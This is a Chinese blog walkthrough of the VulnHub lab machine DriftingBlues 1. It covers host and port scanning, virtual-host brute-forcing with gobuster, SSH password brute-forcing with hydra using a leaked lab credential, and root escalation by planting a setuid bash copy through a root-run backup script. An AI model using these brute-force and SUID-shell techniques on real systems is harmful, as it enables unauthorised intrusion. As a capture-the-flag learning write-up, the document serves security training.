vulnhub靶机:drifting1

最新推荐文章于 2024-07-22 22:46:35 发布
最新推荐文章于 2024-07-22 22:46:35 发布
阅读量684 收藏 15
点赞数 24
文章标签: 服务器 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waitagirl/article/details/136889645
版权

一:主机发现

arp-scan -I eth0 10.9.23.0/24

二:端口扫描

nmap -T4 -sV -p- -A 10.9.23.102

三:目录探测

dirb http://10.9.23.102 -X .txt,.php,.html,.bak,.md

四:渗透测试

Charles Brown

sheryl@driftingblues.box

eric@driftingblues.box

L25vdGVmb3JraW5nZmlzaC50eHQ=

base64在线解密

Base64在线加密解密-在线Base64加密解密工具-Base64编码解码工具

/noteforkingfish.txt

得到一个路径

得到了一个 /noteforkingfish.txt 进行访问 发现有很多ok 直接想到了ok解码:

Brainfuck/Text/Ook! obfuscator - deobfuscator. Decode and encode online.

提示使用主机目录

driftingblues.box

先修改host文件

使用Gobuster进行子域名暴力破解

apt-get install gobuster

gobuster vhost -u driftingblues.box -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt | grep "Status: 200"

发现一个新域名,添加到host文件中

test.driftingblues.box

继续使用工具dirb扫一下刚刚得到的域名 :

dirb http://test.driftingblues.box

在robot.txt中得到的目录得到

/ssh_cred.txt

1mw4ckyyucky

提示ssh后面加了一个数字作为密码,所以自己创建一个密码字典进行爆破

hydra -l eric -P 1password.txt -v 10.9.23.102 ssh

得到密码为:

1mw4ckyyucky6

ssh登录

ssh eric@10.9.23.102

在user.txt中发现第一个flag

尝试提权

继续查看一下备份文件backup.sh 发现sudo执行/tmp/emergency文件 但是/tmp 下面没有 需要创建 并将eric用户加入sudo

echo 'cp /bin/bash /tmp/getroot; chmod +s /tmp/getroot' > /tmp/emergency
chmod +x emergency
./getroot -p

chmod +x emergency
./getroot -p


 

切换到root得到第二个flag

不言君
关注
  • 24
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
[Vulnhub靶机] DriftingBlues: 5
haosha。的博客
02-13 1952
[Vulnhub靶机] DriftingBlues: 5靶机渗透思路及方法(个人分享)
vulnhub靶机driftingblues-2
waitagirl的博客
03-20 680
drifting2靶机
VulnHub:crossroads靶机实战
Aukum的博客
07-03 1081
smb+反弹shell+图片隐写+suid提权,拿下vulnhub-crossroads。
Vulnhub--DriftingBlues-1靶机通关详解
m0_72634167的博客
03-21 1957
1.自动任务提权的思路2.gobuster工具爆破子域名3.crunch生成密码列表的命令行工具的使用。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
netty入门-3 EventLoop和EventLoopGroup,简单的服务器实现
保存我对一些技术的思考
07-19 1125
netty简单实现服务器客户端。EventLoop和EventLoopGroup的基本使用
Linux:基础命令学习
qq_55038440的博客
07-20 1127
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
服务器证书基于 OpenSSL一键颁发脚本
Rambo's Blog
07-19 675
第二组必传入参:生成证书组织(含义:ST,L,O,OU 示例:Guangdong,Shenzhen,Rambo Technology,sms-applet)第一组必传入参:生成证书域名(示例-1:100.100.100.101 示例-2:100.100.100.101,harbor.rambo123.com)如果采用非 root 权限执行脚本,可能在执行过程中需要输入当前用户的密码,请留意控制台的实时动态。统一研发、测试、生产环境的部署模式、部署结构、维护手册的标准。单域名或 IP 的证书颁发示例。
Cookies和session区别
qq_39495959的博客
07-19 569
Cookies数据存储在客户端(浏览器)中,而Session数据存储在服务器端。这意味着Cookies是客户端技术,而Session是服务器端技术。
shell编程之条件语句
yangye2424637628的博客
07-19 545
这种情况与多分支的 if 语句非常相似,只不过 if 语句需要判断多个 不同的条件,而 case 语句只是判断一个变量的不同取值。case 语句可以使脚本程序的结构更加清晰、层次分明,常用于服务的启动、重启、停止的脚本,有的服务不提供这种控制脚本,需要用case语句编写。③模式字符串中,可以用方括号表示一个连续的范围,如"[0-9]",还可以用竖杠符号 “|”表示或,如“A|B”。两个括号[[ ]] :可用于处理逻辑命令,也可以处理字符串是否相等,且使用< 、>不用转义符。"表示命令序列的结束。
Linux文件与相关函数的知识点1
最新发布
2302_81386929的博客
07-22 1218
如上图,从左往右看,从第二位起,每三个分成一类,第一类表示此电脑用户,第二类表示组用户,第三类表示其他用户,每三个里面都表示着各种权限,r是可读w是可写x是可执行,所以能够轻易地得到此文件不同用户对他的权限,如第一行的文件就是此电脑用户可读可写可执行,组用户可读不可写可执行,以此类推。0x00002000 O_CREAT 表示如果指定文件不存在,则创建这个文件 0x0000 0100 O_EXCL 表示如果要创建的文件已存在,则出错,同时返回-1,并且修改errno 的值。
Linux 』简要介绍System V IPC 消息队列 && 信号量
小侯宝的博客
07-21 1115
获取/创建 一个消息队列获取/创建一个消息队列通常使用msgget()系统调用接口;NAMESYNOPSIS返回值为int类型,与System V共享内存相同,当该系统调用接口调用成功时将返回一个msqid用于对消息队列的具体操作;调用失败时返回-1并设置errno;key_t key与共享内存相同,传入一个key值使多个进程可通过该key值看到同一份资源(消息队列);该参数可用户自定或是通过调用系统调用接口ftok()进行传入(ftok()系统调用接口不赘述);int msgflg。
Linux第四节课(指令与权限)
weixin_47702917的博客
07-21 858
用户将指令发给命令行解释器(例如Bash命令行),然后命令行解释器将信息发送给操作系统,操作系统处理信息后再把信息经过命令行解释器发给用户!
mariadb安装在服务器Linux
NLP与推荐算法
07-22 308
linux系统安装mariadb数据库
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值